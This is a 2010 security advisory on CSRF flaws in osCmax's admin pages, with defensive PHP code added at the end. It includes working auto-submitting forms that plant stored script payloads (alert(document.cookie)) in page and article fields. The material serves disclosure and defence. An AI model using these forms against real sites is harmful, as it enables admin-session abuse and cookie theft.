Cross-site Request Forgery (CSRF) Vulnerabilities in osCmax

2010-06-07T00:00:00
ID HTB22423
Type htbridge
Reporter High-Tech Bridge
Modified 2010-06-07T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in osCmax which could be exploited to perform cross-site request forgery attacks.

1) Cross-site request forgery (CSRF) in osCmax
1.1 The vulnerability exists due to insufficient validation of the request origin in admin/define_mainpage.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and edit the main page. Due to insufficient sanitization of input data in the "file_contents" parameter it is also possible to store and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

Exploitation example:
<form action="http://example.com/admin/define_mainpage.php?lngdir=english&filename=mainpage.php&action=save" method="post" name="main" >
<input type="hidden" name="file_contents" value='page html content"><script>alert(document.cookie)</script>' />
<input type="hidden" name="x" value="1" />
<input type="hidden" name="y" value="2" />
</form>
<script>
document.main.submit();
</script>

1.2 The vulnerability exists due to insufficient validation of the request origin in admin/articles.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify articles. Due to insufficient sanitization of input data in the "articles_description[]" parameter it is also possible to store and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

Exploitation example:
<form action="http://example.com/admin/articles.php?tPath=1&aID=1&action=update_article" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="articles_status" value="1" />
<input type="hidden" name="articles_date_available" value="2010-06-04" />
<input type="hidden" name="authors_id" value="" />
<input type="hidden" name="articles_date_added" value="2010-06-04 00:00:00" />
<input type="hidden" name="x" value="1" />
<input type="hidden" name="y" value="2" />
<input type="hidden" name="articles_name[1]" value="article name" />
<input type="hidden" name="articles_description[1]" value='content"><script>alert(document.cookie)</script>' />
<input type="hidden" name="articles_url[1]" value="" />
<input type="hidden" name="articles_head_title_tag[1]" value="article title" />
<input type="hidden" name="articles_head_desc_tag[1]" value="" />
<input type="hidden" name="articles_head_keywords_tag[1]" value="" />
<input type="hidden" name="articles_name[2]" value="article name" />
<input type="hidden" name="articles_description[2]" value='content"><script>alert(document.cookie)</script>' />
<input type="hidden" name="articles_url[2]" value="" />
<input type="hidden" name="articles_head_title_tag[2]" value="article title" />
<input type="hidden" name="articles_head_desc_tag[2]" value="" />
<input type="hidden" name="articles_head_keywords_tag[2]" value="" />
<input type="hidden" name="articles_name[3]" value="article name" />
<input type="hidden" name="articles_description[3]" value='content"><script>alert(document.cookie)</script>' />
<input type="hidden" name="articles_url[3]" value="" />
<input type="hidden" name="articles_head_title_tag[3]" value="article title" />
<input type="hidden" name="articles_head_desc_tag[3]" value="" />
<input type="hidden" name="articles_head_keywords_tag[3]" value="" />
<input type="hidden" name="x" value="3" />
<input type="hidden" name="y" value="4" />
</form>
<script>
document.main.submit();
</script>
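
Both 1.1 and 1.2 share the same two root causes: the admin handlers accept any POST carrying the administrator's session cookie without checking that the request was issued from the site's own form, and they echo stored content back into HTML without escaping. The following is an added example of how such an admin handler can close both gaps; it is not osCmax code and does not claim to be the vendor's fix. The function names (csrf_token, csrf_field, csrf_verify, same_origin, escape_html), the session key csrf_token and the use of file_contents and action=save as the protected field and action are assumptions chosen to mirror the advisory; it requires PHP 7 or later for random_bytes() and the null-coalescing operator.

```php
<?php
// Added example, not osCmax code: synchroniser-token CSRF check plus
// output escaping for a state-changing admin form handler.
// All function and session key names below are hypothetical.

if (session_status() !== PHP_SESSION_ACTIVE) {
    session_start();
}

// Return the per-session CSRF token, generating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every form that changes server state.
// A page on another origin cannot read this value, so a forged form cannot include it.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

// Accept the POST only if the submitted token equals the session token.
// hash_equals() compares in constant time to avoid a timing side channel.
function csrf_verify(array $post): bool
{
    if (empty($_SESSION['csrf_token']) || !isset($post['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

// Defence in depth: the browser-supplied Origin (or Referer) header must name
// our own host. A missing header is treated as a failure, which is the
// conservative choice for state-changing requests.
function same_origin(array $server, string $expected_host): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($source === null) {
        return false;
    }
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expected_host) === 0;
}

// Escape stored content before placing it in HTML so a saved payload such as
// content"><script>...</script> is rendered as text rather than executed.
function escape_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Host name without any port suffix, for comparison with Origin/Referer.
$own_host = explode(':', $_SERVER['HTTP_HOST'] ?? '')[0];

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_GET['action'] ?? '') === 'save') {
    // Both checks run before any state is touched; on failure nothing is written.
    if (!same_origin($_SERVER, $own_host) || !csrf_verify($_POST)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    $contents = (string) ($_POST['file_contents'] ?? '');
    // ... persist $contents here (hypothetical storage step) ...
    echo '<p>Saved. Preview:</p><pre>' . escape_html($contents) . '</pre>';
} else {
    // Render the edit form with the token included; the token travels only
    // to pages served from this origin.
    echo '<form method="post" action="?action=save">'
        . csrf_field()
        . '<textarea name="file_contents"></textarea>'
        . '<input type="submit" value="Save" />'
        . '</form>';
}
```

With this in place, the forms shown in the exploitation examples above fail the csrf_verify() check because they carry no token, and even a request that somehow reached the storage step would have its content escaped on output instead of being interpreted as markup. Rejecting requests with no Origin or Referer header can break legitimate clients behind privacy proxies that strip those headers; if that matters in a deployment, keep the token check as the mandatory control and log, rather than block, on a missing origin header.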